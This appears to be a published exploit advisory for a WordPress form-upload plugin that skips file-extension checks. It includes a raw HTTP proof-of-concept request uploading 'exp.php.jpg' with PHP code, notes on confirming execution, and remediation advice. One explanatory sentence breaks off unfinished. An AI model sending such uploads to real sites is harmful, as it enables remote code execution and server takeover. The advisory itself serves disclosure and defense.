################################################################################
# Exploit Title: WordPress Plugin Ajax Upload for Gravity Forms - Arbitrary File Upload (ZIP)
# Date: 2026-02-05
# Exploit Author: UnM@SK
# Vendor Homepage: https://github.com/WPPlugins/ajax-upload-for-gravity-forms
# Category: Webapps
# Vulnerability Type: [CWE-434] Unrestricted Upload of File with Dangerous Type
################################################################################
[+] Description:
The "Ajax Upload for Gravity Forms" plugin for WordPress does not validate
uploaded file extensions in its AJAX handler (admin-ajax.php, action
'itsg_ajaxupload_upload_file'). This allows unauthenticated attackers to
upload arbitrary files, including PHP scripts disguised with a double
extension (e.g. exp.php.jpg) and .zip archives containing malicious
scripts. Where the web server executes the stored file, this leads to
Remote Code Execution (RCE) and full server compromise.
[+] Proof of Concept (PoC):
POST /wp-admin/admin-ajax.php?action=itsg_ajaxupload_upload_file HTTP/2
Host: [TARGET_HOST]
Content-Type: multipart/form-data; boundary=---------------------------18990914928282

-----------------------------18990914928282
Content-Disposition: form-data; name="files[]"; filename="exp.php.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>
-----------------------------18990914928282--
[+] Exploitation Note:
The application accepts the file because it either checks only the
initial magic bytes or skips the extension check entirely when the file
is sent via the 'itsg_ajaxupload_upload_file' action. Note that the PoC
body above carries no JPEG header, so a successful upload of it shows the
extension check is skipped; whether the stored exp.php.jpg is then
executed as PHP depends on the web server configuration (for example an
Apache AddHandler rule that matches a '.php' segment anywhere in the
name), so confirm by requesting the uploaded file and checking for
phpinfo() output. Attackers can bundle a
[+] Impact:
- Arbitrary File Upload.
- Remote Code Execution where the web server executes the uploaded file
  as PHP.
[+] Recommendations:
- Disable the plugin if not in use.
- Validate every entry of the 'files[]' array server side against an
  allowlist of image extensions: check the final extension, reject names
  that contain an executable extension (.php, .phtml, ...) anywhere, and
  verify the content matches the claimed type.
- Store uploads under a server-generated file name, never the
  client-supplied one, and disable PHP execution in the upload directory.
- Use 'wp_handle_upload()' (which calls 'wp_check_filetype_and_ext()') or
  similar WordPress core functions that provide built-in type checks.
################################################################################